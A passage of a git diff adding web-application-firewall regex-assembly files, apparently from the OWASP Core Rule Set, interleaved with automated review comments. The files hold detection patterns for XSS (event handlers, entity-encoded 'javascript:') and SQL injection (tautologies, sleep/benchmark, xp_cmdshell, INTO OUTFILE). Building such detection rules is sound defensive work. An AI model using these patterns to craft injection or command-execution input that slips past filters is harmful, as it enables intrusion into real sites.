onclick + onclose + oncommand + oncommandupdate + oncomplete + oncompositionend + oncompositionstart + oncompositionupdate + onconnected + onconnecting + oncontextmenu + oncontrolselect + oncopy + 
oncuechange + oncut + ondataavailable + ondatachange + ondataerror + ondatasetchanged + ondatasetcomplete + ondblclick + ondeactivate + ondeliveryerror + ondeliverysuccess + ondevicefound + ondevicelight + ondevicemotion + ondeviceorientation + ondeviceproximity + ondialing + ondisabled + ondischargingtimechange + ondisconnected + ondisconnecting + ondomactivate + ondomattrmodified + ondomcharacterdatamodified + ondomfocusin + ondomfocusout + ondommousescroll + ondomnodeinserted + ondomnodeinsertedintodocument + ondomnoderemoved + ondomnoderemovedfromdocument + ondomsubtreemodified + ondownloading + ondragdrop + ondragend + ondragenter + ondragexit + ondraggesture + ondragleave + ondragover + ondragstart + ondrop + ondurationchange + onemptied + onenabled + onend + onended + onendEvent + onenter + onerror + onerrorupdate + onexit + onfailed + onfilterchange + onfinish + onfocus + onfocusin + onfocusout + onformchange + onforminput + onfullscreenchange + ongamepadaxismove + ongamepadbuttondown + ongamepadbuttonup + ongamepadconnected + ongamepaddisconnected + onget + onhashchange + onheadphoneschange + onheld + onhelp + onholding + onicccardlockerror + oniccinfochange + onincoming + oninput + oninvalid + onkeydown + onkeypress + onkeyup + onlevelchange + onload + onloadeddata + onloadedmetadata + onloadend + onloadstart + onlosecapture + only + onmark + onmessage + onmousedown + onmouseenter + onmouseleave + onmousemove + onmouseout + onmouseover + onmouseup + onmousewheel + onmove + onmoveend + onmovestart + onmozafterpaint + onmozaudioavailable + onmozbeforeresize + onmozedgeuicanceled + onmozedgeuicompleted + onmozedgeuistarted + onmozfullscreenchange + onmozfullscreenerror + onmozmagnifygesture + onmozmagnifygesturestart + onmozmagnifygestureupdate + onmozmousehittest + onmozmousepixelscroll + onmoznetworkdownload + onmoznetworkupload + onmozorientationchange + onmozpointerlockchange + onmozpointerlockerror + onmozpresstapgesture + onmozrotategesture + 
onmozrotategesturestart + onmozrotategestureupdate + onmozscrolledareachanged + onmozswipegesture + onmozswipegestureend + onmozswipegesturestart + onmozswipegestureupdate + onmoztapgesture + onmoztimechange + onnomatch + onnoupdate + onobsolete + onoffline + ononline + onopen + onoverflow + onoverflowchanged + onpagehide + onpageshow + onpaint + onpaste + onpause + onplay + onplaying + onpointerdown + onpointerenter + onpointerleave + onpointermove + onpointerout + onpointerover + onpointerrawupdate + onpointerup + onpopstate + onpopuphidden + onpopuphiding + onpopupshowing + onpopupshown + onprogress + onpropertychange + onratechange + onreadystatechange + onreceived + onremovetrack + onrepeat + onrepeatEvent + onrequest + onreset + onresize + onresult + onresume + onresuming + onretrieving + onrowenter + onrowexit + onrowsdelete + onrowsinserted + onscroll + onscrollend + onsearch + onseekcomplete + onseeked + onseeking + onselect + onselectionchange + onselectstart + onsending + onsent + onset + onshow + onsoundend + onsoundstart + onspeechend + onspeechstart + onstalled + onstart + onstatechange + onstatuschanged + onstkcommand + onstksessionend + onstop + onsubmit + onsuccess + onsuspend + onsvgabort + onsvgerror + onsvgload + onsvgresize + onsvgscroll + onsvgunload + onsvgzoom + ontext + ontimeout + ontimeupdate + ontoggle + ontouchcancel + ontouchend + ontouchenter + ontouchleave + ontouchmove + ontouchstart + ontransitioncancel + ontransitionend + ontransitionrun + ontransitionstart + onunderflow + onunhandledrejection + onunload + onupdateready + onupgradeneeded + onuserproximity + onussdreceived + onversionchange + onvoicechange + onvolumechange + onwaiting + onwarning + onwebkitanimationend + onwebkitanimationiteration + onwebkitanimationstart + onwebkittransitionend + onwheel + onzoom + ping + src + style + ##!=< html-properties +##!< + +##!> assemble + [\s\x08]*?= + ##!=< html-properties-end +##!< + +##!> assemble + ##!=> js-prop-prefix + ##!=> 
js-payloads +##!< + +##!> assemble + ##!=> html-properties-prefix + ##!=> html-properties + ##!=> html-properties-end +##!< diff --git a/regex-assembly/941210.ra b/regex-assembly/941210.ra new file mode 100644 index 0000000000..46f9bc6677 --- /dev/null +++ b/regex-assembly/941210.ra 
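Review bot: `only`, listed between `onlosecapture` and `onmark` in the html-properties block of 941160.ra, is not an event-handler attribute name; combined with the `[\s\x08]*?=` suffix it turns any `only=` attribute into a hit, which looks like a typo carried over from an older list rather than a deliberate entry. If it is deliberate, a comment on that line should say so; otherwise drop it. Separately, `onbeginEvent`, `onendEvent` and `onrepeatEvent` are the only mixed-case names in an otherwise lowercase list — harmless under `##!+ i`, but normalising them keeps the list sortable and greppable.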
@@ -0,0 +1,231 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This rule tries to match all the possible ways to write 'javascript' using +##! html entities, and javascript escape sequences. +##! See https://html.spec.whatwg.org/multipage/named-characters.html#named-character-references for examples. +##! And https://www.w3schools.com/charsets/ref_html_ascii.asp for the list of +##! all the possible html entities. + +##!+ i + +##! Matched order is sequential: we first match 'j', then 'a', then 'v', etc. + +##!> define html_entity_hex_prefix �* +##!> define html_entity_dec_prefix �* +##!> define whitespaces [\t\n\r] + +##! html_encoded_whitespace is a list of all the possible ways to write an encoded whitespace +##!> assemble + ##! canonical form + {{whitespaces}} + ##! alternative forms + ##!> assemble + ##! 09 horizontal tab + ##! 10 line feed + ##! 13 carriage return + ##! 0A line feed (hex) + ##! 0D carriage return (hex) + {{html_entity_dec_prefix}}9;? + {{html_entity_dec_prefix}}10;? + {{html_entity_dec_prefix}}13;? + {{html_entity_hex_prefix}}A;? + {{html_entity_hex_prefix}}D;? + &tab; + &newline; + ##!=> + ##!< + ##!=> + * + ##!=< html_encoded_whitespace +##!< + +##! all the possible ways to end the word 'javascript', plus whitespaces +##!> assemble + ##! canonical form + : + ##! alternative forms + ##!> assemble + ##! 58 : colon + ##! 3A : colon (hex) + {{html_entity_dec_prefix}}58;? + {{html_entity_hex_prefix}}3A;? + : + ##!< + ##!=> + . + ##!=< end_javascript +##!< + +##! all the possible ways to write 'j', plus whitespaces +##! canonical form +j +##! alternative forms +##!> assemble + ##! J 74 uppercase J + ##! j 106 lowercase j + ##! J 4A uppercase J (hex) + ##! j 6A lowercase j (hex) + {{html_entity_dec_prefix}}74; + {{html_entity_dec_prefix}}106; + {{html_entity_hex_prefix}}4A; + {{html_entity_hex_prefix}}6A; +##!< +##!=> +##!=> html_encoded_whitespace + +##! 
all the possible ways to write 'a', plus whitespaces +##!> assemble + ##! canonical form + a + ##! alternative forms + ##!> assemble + ##! A 65 uppercase A + ##! a 97 lowercase a + ##! A 41 uppercase A (hex) + ##! a 61 lowercase a (hex) + {{html_entity_dec_prefix}}65; + {{html_entity_dec_prefix}}97; + {{html_entity_hex_prefix}}41; + {{html_entity_hex_prefix}}61; + ##!< + ##!=> + ##!=> html_encoded_whitespace + ##!=< all_possible_ways_to_write_a +##!< + +##!=> all_possible_ways_to_write_a + +##! all the possible ways to write 'v', plus whitespaces +##! canonical form +v +##! alternative forms +##!> assemble + ##! V 86 uppercase V + ##! V 56 uppercase V (hex) + ##! v 118 lowercase v + ##! v 76 lowercase v (hex) + {{html_entity_dec_prefix}}86; + {{html_entity_hex_prefix}}56; + {{html_entity_dec_prefix}}118; + {{html_entity_hex_prefix}}76; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> all_possible_ways_to_write_a + +##! all the possible ways to write 's', plus whitespaces +##! canonical form +s +##! alternative forms +##!> assemble + ##! s 115 lowercase s + ##! s 73 lowercase s (hex) + ##! S 83 uppercase S + ##! S 53 uppercase S (hex) + {{html_entity_dec_prefix}}115; + {{html_entity_hex_prefix}}73; + {{html_entity_dec_prefix}}83; + {{html_entity_hex_prefix}}53; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'c', plus whitespaces +##! canonical form +c +##! alternative forms +##!> assemble + ##! c 63 lowercase C (hex) + ##! c 99 lowercase c + ##! C 43 uppercase c (hex) + ##! C 67 uppercase C + {{html_entity_hex_prefix}}63; + {{html_entity_dec_prefix}}99; + {{html_entity_hex_prefix}}43; + {{html_entity_dec_prefix}}67; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'r', plus whitespaces +##! canonical form +r +##! alternative forms +##!> assemble + ##! r 72 lowercase R (hex) + ##! r 114 lowercase r + ##! r 52 uppercase r (hex) + ##! 
R 82 uppercase R + {{html_entity_hex_prefix}}72; + {{html_entity_dec_prefix}}114; + {{html_entity_hex_prefix}}52; + {{html_entity_dec_prefix}}82; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'i', plus whitespaces +##! canonical form +i +##! alternative forms +##!> assemble + ##! i 69 lowercase i (hex) + ##! i 105 lowercase i + ##! I 49 uppercase i (hex) + ##! I 73 uppercase I + {{html_entity_hex_prefix}}69; + {{html_entity_dec_prefix}}105; + {{html_entity_hex_prefix}}49; + {{html_entity_dec_prefix}}73; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'p', plus whitespaces +##! canonical form +p +##! alternative forms +##!> assemble + ##! p 70 lowercase p (hex) + ##! p 112 lowercase p + ##! P 50 uppercase p (hex) + ##! P 80 uppercase P + {{html_entity_hex_prefix}}70; + {{html_entity_dec_prefix}}112; + {{html_entity_hex_prefix}}50; + {{html_entity_dec_prefix}}80; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 't', plus whitespaces +##! canonical form +t +##! alternative forms +##!> assemble + ##! t 74 lowercase t (hex) + ##! t 116 lowercase t + ##! T 54 uppercase t (hex) + ##! T 84 uppercase T + {{html_entity_hex_prefix}}74; + {{html_entity_dec_prefix}}116; + {{html_entity_hex_prefix}}54; + {{html_entity_dec_prefix}}84; +##!< +##!=> +##!=> html_encoded_whitespace +##!=> + +##!=> end_javascript diff --git a/regex-assembly/941220.ra b/regex-assembly/941220.ra new file mode 100644 index 0000000000..36975fc185 --- /dev/null +++ b/regex-assembly/941220.ra 
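Review bot: Several per-letter comments in 941210.ra describe the wrong case, e.g. `##! c 63 lowercase C (hex)` / `##! C 43 uppercase c (hex)` and `##! r 52 uppercase r (hex)`, where the glyph and the word disagree; the same lines recur for r, i, p and t here and again in 941220.ra. A consistent form such as `##! c 63 lowercase c (hex)` / `##! C 43 uppercase C (hex)` makes the table self-checking. One substantive point for both files: the whitespace entities use `;?` (optional terminator) while the letter entities require the `;`; this asymmetry is not explained anywhere, so state in the comment above `html_encoded_whitespace` whether it is a deliberate false-positive trade-off or a known coverage limit.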
@@ -0,0 +1,212 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This rule tries to match all the possible ways to write 'vbscript' using +##! html entities, and javascript escape sequences. +##! See https://html.spec.whatwg.org/multipage/named-characters.html#named-character-references for examples. +##! And https://www.w3schools.com/charsets/ref_html_ascii.asp for the list of +##! all the possible html entities. + +##!+ i + +##! Matched order is sequential: we first match 'v', then 'b', then 's', etc. + +##!> define html_entity_hex_prefix �* +##!> define html_entity_dec_prefix �* +##!> define whitespaces [\t\n\r] + +##! html_encoded_whitespace is a list of all the possible ways to write an encoded whitespace +##!> assemble + ##! canonical form + {{whitespaces}} + ##! alternative forms + ##!> assemble + ##! 09 horizontal tab + ##! 10 line feed + ##! 13 carriage return + ##! 0A line feed (hex) + ##! 0D carriage return (hex) + {{html_entity_dec_prefix}}9;? + {{html_entity_dec_prefix}}10;? + {{html_entity_dec_prefix}}13;? + {{html_entity_hex_prefix}}A;? + {{html_entity_hex_prefix}}D;? + &tab; + &newline; + ##!=> + ##!< + ##!=> + * + ##!=< html_encoded_whitespace +##!< + +##! all the possible ways to end the word 'vbscript', plus whitespaces +##!> assemble + ##! canonical form + : + ##! alternative forms + ##!> assemble + ##! 58 : colon + ##! 3A : colon (hex) + {{html_entity_dec_prefix}}58;? + {{html_entity_hex_prefix}}3A;? + : + ##!< + ##!=> + . + ##!=< end_vbscript +##!< + +##!=> +##! all the possible ways to write 'v', plus whitespaces +##! canonical form +v +##! alternative forms +##!> assemble + ##! v 118 lowercase v + ##! v 76 lowercase v (hex) + ##! V 86 uppercase V + ##! V 56 uppercase V (hex) + {{html_entity_dec_prefix}}118; + {{html_entity_hex_prefix}}76; + {{html_entity_dec_prefix}}86; + {{html_entity_hex_prefix}}56; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! 
all the possible ways to write 'b', plus whitespaces +##! canonical form +b +##! alternative forms +##!> assemble + ##! b 98 lowercase b + ##! b 62 lowercase b (hex) + ##! B 66 uppercase B + ##! B 42 uppercase B (hex) + {{html_entity_dec_prefix}}98; + {{html_entity_hex_prefix}}62; + {{html_entity_dec_prefix}}66; + {{html_entity_hex_prefix}}42; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 's', plus whitespaces +##! canonical form +s +##! alternative forms +##!> assemble + ##! s 115 lowercase s + ##! s 73 lowercase s (hex) + ##! S 83 uppercase S + ##! S 53 uppercase S (hex) + {{html_entity_dec_prefix}}115; + {{html_entity_hex_prefix}}73; + {{html_entity_dec_prefix}}83; + {{html_entity_hex_prefix}}53; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'c', plus whitespaces +##! canonical form +c +##! alternative forms +##!> assemble + ##! c 63 lowercase C (hex) + ##! c 99 lowercase c + ##! C 43 uppercase c (hex) + ##! C 67 uppercase C + {{html_entity_hex_prefix}}63; + {{html_entity_dec_prefix}}99; + {{html_entity_hex_prefix}}43; + {{html_entity_dec_prefix}}67; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'r', plus whitespaces +##! canonical form +r +##! alternative forms +##!> assemble + ##! r 72 lowercase R (hex) + ##! r 114 lowercase r + ##! r 52 uppercase r (hex) + ##! R 82 uppercase R + {{html_entity_hex_prefix}}72; + {{html_entity_dec_prefix}}114; + {{html_entity_hex_prefix}}52; + {{html_entity_dec_prefix}}82; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'i', plus whitespaces +##! canonical form +i +##! alternative forms +##!> assemble + ##! i 69 lowercase i (hex) + ##! i 105 lowercase i + ##! I 49 uppercase i (hex) + ##! 
I 73 uppercase I + {{html_entity_hex_prefix}}69; + {{html_entity_dec_prefix}}105; + {{html_entity_hex_prefix}}49; + {{html_entity_dec_prefix}}73; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'p', plus whitespaces +##! canonical form +p +##! alternative forms +##!> assemble + ##! p 70 lowercase p (hex) + ##! p 112 lowercase p + ##! P 50 uppercase p (hex) + ##! P 80 uppercase P + {{html_entity_hex_prefix}}70; + {{html_entity_dec_prefix}}112; + {{html_entity_hex_prefix}}50; + {{html_entity_dec_prefix}}80; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 't', plus whitespaces +##! canonical form +t +##! alternative forms +##!> assemble + ##! t 74 lowercase t (hex) + ##! t 116 lowercase t + ##! T 54 uppercase t (hex) + ##! T 84 uppercase T + {{html_entity_hex_prefix}}74; + {{html_entity_dec_prefix}}116; + {{html_entity_hex_prefix}}54; + {{html_entity_dec_prefix}}84; +##!< +##!=> +##!=> html_encoded_whitespace +##!=> + +##!=> end_vbscript diff --git a/regex-assembly/941390.ra b/regex-assembly/941390.ra new file mode 100644 index 0000000000..92288915a9 --- /dev/null +++ b/regex-assembly/941390.ra @@ -0,0 +1,16 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##!^ \b +##!$ \s*\( + +eval +settimeout +setinterval +new\s+Function +alert +atob +btoa +prompt +confirm diff --git a/regex-assembly/942120.ra b/regex-assembly/942120.ra new file mode 100644 index 0000000000..f12014ed10 --- /dev/null +++ b/regex-assembly/942120.ra 
@@ -0,0 +1,37 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+\!\=
+\&\&
+\|\|
+>>
+<<
+>=
+<=
+<>
+<=>
+\bxor\b
+\bregexp\b
+regexp\s+binary
+\bisnull\b
+\brlike\b
+rlike\s+binary
+not\s+between\s+0\s+and
+not\s+between\s+(?:(?:'[^']*')|(?:\"[^\"]*\"))\s+and\s+(?:(?:'[^']*')|(?:\"[^\"]*\"))
+is\s+null
+like\s+null
+^in[+\s]*\([\s\d\"]+[^()]*\)
+\Win[+\s]*\([\s\d\"]+[^()]*\)
+<>\s+binary
+\bcollate\W*?(?:U&)?[\"'`]
+\bcollate\W+(?:binary|nocase|rtrim)\b
+\bcollate\W+\w*?_
+\bnotnull\b
+like\s+[\w]+\s+escape\b
+\bilike\b
+[<>=!]{1,2}\s*all\b
+\blikelihood\s*\(
+\bunlikely\s*\(
+\blikely\s*\(
diff --git a/regex-assembly/942130.ra b/regex-assembly/942130.ra
new file mode 100644
index 0000000000..66beb373e9
--- /dev/null
+++ b/regex-assembly/942130.ra
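Review bot: `like\s+[\w]+\s+escape\b` in 942120.ra spells `\w+` as `[\w]+`, and the two `in[+\s]*\(` lines differ only in their `^`/`\W` anchor; the assembler will merge them, but the source reads more clearly as a single `(?:^|\W)in[+\s]*\(`. Neither change alters the generated expression. The escapes in `\!\=` and `\&\&` are likewise unnecessary outside a character class (unlike `\|\|`), but harmless.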
@@ -0,0 +1,42 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##! General comments:
+##!
+##! The idea behind this expressions is to capture simple logic based (un)equalities that
+##! are used to quickly test SQL Logic that always returns TRUE (hence the term "SQL Tautology").
+
+##! We also want to capture the left and right side, and compare for equality.
+##! That's why you see below that some of the patterns include grouping explicitly
+
+##! Prefix: captures the initial part that will be matched on the right hand side of the logical construct.
+
+##!^ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?
+
+##! These expressions try to match the logic using the operator,
+##! so when the operator targets a TRUE operation, the initial match
+##! should be present after the operator, logically meaning TRUE
+##!
+##! Examples:
+##! '1' = '1'
+##! 'f' like 'f'
+
+##! This one will also match the "equal" part of '<=' and '>='
+=[\s'\"`()]*?\b([\d\w]+)\b
+
+##! <=> NULL-safe equal to operator in MySQL
+<=>[\s'\"`()]*?\b([\d\w]+)\b
+
+##! Like queries allow you to use wilcards: '%'
+
+like[\s'\"`()]*?\b([\d\w]+)\b
+sounds\s+like[\s'\"`()]*?\b([\d\w]+)\b
+
+##! GLOB operator is used to match text values against a pattern
+glob[\s'\"`()]*?\b([\d\w]+)\b
+
+##! String based regexp. These don't use % as wildcard.
+rlike[\s'\"`()]*?\b([\d\w]+)\b
+regexp[\s'\"`()]*?\b([\d\w]+)\b
diff --git a/regex-assembly/942131.ra b/regex-assembly/942131.ra
new file mode 100644
index 0000000000..d4ebdfd925
--- /dev/null
+++ b/regex-assembly/942131.ra
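Review bot: `[\d\w]` in the prefix and in every capture of 942130.ra (and throughout 942131.ra) is identical to `\w`, since `\w` already contains the digits; writing `\b(\w+)\b` makes the capture that the rule later compares easier to read and removes the hint that digits are treated specially. In the prose, `this expressions` should be `these expressions` and `wilcards` `wildcards`; the same `this expressions` line appears in 942131.ra.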
@@ -0,0 +1,42 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+
+##! General comments:
+##!
+##! The idea behind this expressions is to capture simple logic based (un)equalities that
+##! are used to quickly test SQL Logic that always returns FALSE.
+
+##! Prefix: captures the initial part that will be unmatched on the right hand side of the logical construct.
+
+##!^ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?
+
+##!+ i
+
+##! These expressions try to match the logic using the negative operator,
+##! so when the operator targets a false operation, the initial match
+##! should *not* be present after the operator, effectively meaning TRUE.
+##!
+##! Examples:
+##! '1' <= '2'
+##! 'a' not like 'b'
+##!
+##! SQL Comparison Operators: !=, <=, >=, <>, <, >, !>, !<, ^
+
+\!=[\s'\"`()]*?\b([\d\w]+)\b
+<>[\s'\"`()]*?\b([\d\w]+)\b
+<[\s'\"`()]*?\b([\d\w]+)\b
+\!<[\s'\"`()]*?\b([\d\w]+)\b
+>[\s'\"`()]*?\b([\d\w]+)\b
+\!>[\s'\"`()]*?\b([\d\w]+)\b
+<=[\s'\"`()]*?\b([\d\w]+)\b
+>=[\s'\"`()]*?\b([\d\w]+)\b
+\^[\s'\"`()]*?\b([\d\w]+)\b
+
+is\s+not[\s'\"`()]*?\b([\d\w]+)\b
+not\s+like[\s'\"`()]*?\b([\d\w]+)\b
+
+##! String based regexp.
+
+not\s+rlike[\s'\"`()]*?\b([\d\w]+)\b
+not\s+regexp[\s'\"`()]*?\b([\d\w]+)\b
diff --git a/util/regexp-assemble/regexp-942140.data b/regex-assembly/942140.ra
similarity index 75%
rename from util/regexp-assemble/regexp-942140.data
rename to regex-assembly/942140.ra
index 9ef24c9872..cd2551af3b 100644
--- a/util/regexp-assemble/regexp-942140.data
+++ b/regex-assembly/942140.ra
@@ -1,3 +1,9 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+##!^ \b
+
 database\W*\(
 db_name\W*\(
 information_schema\b
diff --git a/regex-assembly/942150.ra b/regex-assembly/942150.ra
new file mode 100644
index 0000000000..aaaf7ce8ff
--- /dev/null
+++ b/regex-assembly/942150.ra
@@ -0,0 +1,146 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+##!^ \b
+##!$ \W*\(
+
+##! SQLite specific functions
+json
+json_[\w]+
+##! Extracted from docs with:
+##! paths=("lang_corefunc.html" "lang_mathfunc.html" "lang_aggfunc.html"); declare items; for path in "${paths[@]}"; do items+=$(curl https://www.sqlite.org/$path -s | xmllint --html --xpath "//a[contains(@href,'func.html')]/text()" - 2>/dev/null | grep --color=never -Po "^[\w]+(?=\()"); done; echo "$items" | sort | uniq
+abs
+acos
+acosh
+asin
+asinh
+atan
+atan2
+atanh
+ceil
+ceiling
+changes
+char
+coalesce
+cos
+cosh
+count
+degrees
+exp
+floor
+flooravg
+format
+glob
+group_concat
+hex
+ifnull
+iif
+instr
+last_insert_rowid
+length
+like
+likelihood
+likely
+ln
+load_extension
+log
+log10
+log2
+lower
+lowerpi
+ltrim
+max
+min
+mod
+nullif
+pi
+pow
+power
+printf
+quote
+radians
+random
+randomblob
+replace
+round
+rtrim
+sign
+sin
+sinh
+soundex
+sqlite_compileoption_get
+sqlite_compileoption_used
+sqlite_offset
+sqlite_source_id
+sqlite_version
+sqrt
+substr
+substring
+sum
+tan
+tanh
+total
+total_changes
+trim
+trunc
+typeof
+unicode
+unlikely
+upper
+zeroblob
+
+##! Generic SQL functions
+##!
+##! Note: May contain overlap with the generated DBMS specific lists, but this guarantees
+##! A minimum level of protection, even if one of the one-liners creates an unusual set.
+##! Duplicates do not effect the final result of regexp-assemble.
+abs
+acos
+avg
+bin
+cast
+count
+date
+day
+default
+field
+floor
+format
+hour
+char
+charset
+chr
+if
+in
+last
+length
+ln
+local
+log
+max
+min
+minute
+mod
+month
+now
+password
+pi
+power
+repeat
+replace
+reverse
+right
+round
+second
+sign
+sleep
+sum
+tan
+time
+upper
+user
+values
+version
+week
+year
diff --git a/regex-assembly/942151.ra b/regex-assembly/942151.ra
new file mode 100644
index 0000000000..611a28a1e9
--- /dev/null
+++ b/regex-assembly/942151.ra
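Review bot: `flooravg` and `lowerpi` in the SQLite list of 942150.ra are not SQLite function names; they look like two adjacent anchors glued together by the `grep -Po "^[\w]+(?=\()"` step of the extraction one-liner quoted above the list (`floor`, `avg`, `lower` and `pi` are all present on their own). They cost nothing at match time but will mislead anyone auditing coverage, so drop them or re-run the extraction with a per-anchor newline. Also `json_[\w]+` is `json_\w+`, and in the note below it `do not effect` should read `do not affect`.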
@@ -0,0 +1,6 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> include sql-injection-function-names
diff --git a/regex-assembly/942152.ra b/regex-assembly/942152.ra
new file mode 100644
index 0000000000..611a28a1e9
--- /dev/null
+++ b/regex-assembly/942152.ra
@@ -0,0 +1,6 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> include sql-injection-function-names
diff --git a/regex-assembly/942170.ra b/regex-assembly/942170.ra
new file mode 100644
index 0000000000..6a24a4849e
--- /dev/null
+++ b/regex-assembly/942170.ra
@@ -0,0 +1,25 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> define one_or_more_whitespace \s+
+##!> define select_or_terminate (?:select|;){{one_or_more_whitespace}}
+
+##!> assemble
+
+ ##! benchmark may be used to time how quickly MySQL processes the expression
+ {{select_or_terminate}}benchmark
+
+ ##! conditional select
+ {{select_or_terminate}}if
+
+ ##! sleep function
+ {{select_or_terminate}}sleep
+ ##!=>
+
+ ##! function parameters
+ \s*?\(\s*?\(?\s*?\w+
+
+ ##!=>
+##!<
diff --git a/regex-assembly/942180.ra b/regex-assembly/942180.ra
new file mode 100644
index 0000000000..d684e706dc
--- /dev/null
+++ b/regex-assembly/942180.ra
@@ -0,0 +1,62 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> define open-comment (?:/\*)
+##!> define quotes [\"'`]
+##!> define quotes-plus-digits [\d\"'`]
+##!> define comment-suffix (?:--|#|{{open-comment}}|\{)
+##! PB: Should comment-suffix also include "\*/" ?
+
+##!> define logical-operators or|xor|and
+##!> define math-operators div
+##!> define comparison-operators like|between
+##!> define math-symbols [+<>=(),-]
+
+{{open-comment}}+{{quotes}}+\s?{{comment-suffix}}?
+
+##!> assemble
+ {{quotes}}\s*
+ ##!=>
+ ##! logical operators
+ or
+ xor
+ and
+
+ ##! math operators
+ div
+
+ ##! comparison operators
+ like
+ between
+ ##!=>
+ [\w\s-]+{{math-symbols}}\s*{{quotes-plus-digits}}
+ ##!=>
+##!<
+
+
+##!> assemble
+ {{quotes}}
+ ##!=>
+ [<>~]+
+ \s*[^\w\s]?=\s*
+ \W*?[+=]+\W*?
+ ##!=>
+ {{quotes}}
+##!<
+
+##!> assemble
+ {{quotes}}
+ ##!=>
+ \s*[!=|][\d\s!=+-]+.*?[\"'`(].*?$
+ \s*[!=|][\d\s!=]+.*?\d+$
+ \s*(?:like|print)\W+[\w\"'`(]
+ \s*;
+##!<
+
+\d{{quotes}}\s+{{quotes}}\s+\d
+^admin\s*?{{quotes}}
+[\"'`\(\s]\s*?glob\W+[\w\"'`(]
+\sis\s*?0\W
+where\s[\s\w\.,-]+\s=
diff --git a/regex-assembly/942190.ra b/regex-assembly/942190.ra
new file mode 100644
index 0000000000..9353b13d67
--- /dev/null
+++ b/regex-assembly/942190.ra
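Review bot: The standalone pattern `{{open-comment}}+{{quotes}}+\s?{{comment-suffix}}?` ends in an optional group, and an optional group at the end of an alternative can never change whether the expression matches, it only lengthens the captured text; either drop `{{comment-suffix}}?` or make the suffix mandatory if the intent was to require a trailing comment marker after the quote. The line `##! PB: Should comment-suffix also include "\*/" ?` is an unresolved review question checked in as a comment; settle it, or turn it into `##! TODO: decide whether comment-suffix should also include \*/` so it is not mistaken for documentation of the current behaviour. The defines `logical-operators`, `math-operators` and `comparison-operators` are declared but never referenced in this file (the assemble block spells the operators out again), so they are dead unless another file includes this one.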
@@ -0,0 +1,61 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> define quotes [\"'`]
+
+##!> assemble
+ {{quotes}}
+ ##!=>
+ \s*!\s*[\"'`\w]
+ ##!> assemble
+ ;?\s*
+ ##!=>
+ having
+ select
+ ##!> assemble
+ union\b\s*
+ ##!=>
+ all
+ distinct
+ select
+ ##!<
+ ##!=>
+ \b\s*[^\s]
+ ##!<
+##!<
+
+##!> assemble
+ \b
+ ##!=>
+ ##!> assemble
+ connection_id
+ current_user
+ database
+ schema
+ user
+ ##!=>
+ \s*?\(
+ ##!<
+
+ exec\s+master\.
+ execute\s+master\.
+ from\W+information_schema\W
+ ##!> assemble
+ into[\s+]+
+ ##!=>
+ dumpfile
+ outfile
+ ##!=>
+ \s*?{{quotes}}
+ ##!<
+
+ select.*?\w?user\(
+ union\sselect\s@
+ union[\w(\s]*?select
+##!<
+
+\s*?exec.*?\Wxp_cmdshell
+\s*?execute.*?\Wxp_cmdshell
+\Wiif\s*?\(
diff --git a/regex-assembly/942200.ra b/regex-assembly/942200.ra
new file mode 100644
index 0000000000..0d0c35dd2b
--- /dev/null
+++ b/regex-assembly/942200.ra
@@ -0,0 +1,40 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##! Helpers
+##!> define punctuation-hexnumbers ,.*?[)\da-f\"'`]
+
+##!> define ticks [\"'`]
+
+##!> define spaces \s*?\(\s*?space\s*?\(
+
+##! Main assembly
+##!> assemble
+ {{punctuation-hexnumbers}}{{ticks}}
+ ##!=>
+ {{ticks}}.*?{{ticks}}
+ (?:\r?\n)?\z
+ [^\"'`]+
+ ##!=>
+##!<
+
+\Wselect.+\W*?from
+
+##!> assemble
+ alter
+ create
+ delete
+ desc
+ drop
+ insert
+ load
+ rename
+ select
+ truncate
+ update
+ ##!=>
+ {{spaces}}
+ ##!=>
+##!<
diff --git a/regex-assembly/942210.ra b/regex-assembly/942210.ra
new file mode 100644
index 0000000000..dfad326639
--- /dev/null
+++ b/regex-assembly/942210.ra
@@ -0,0 +1,109 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##! Looking for patterns like:
+##! between[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]
+
+##!> assemble
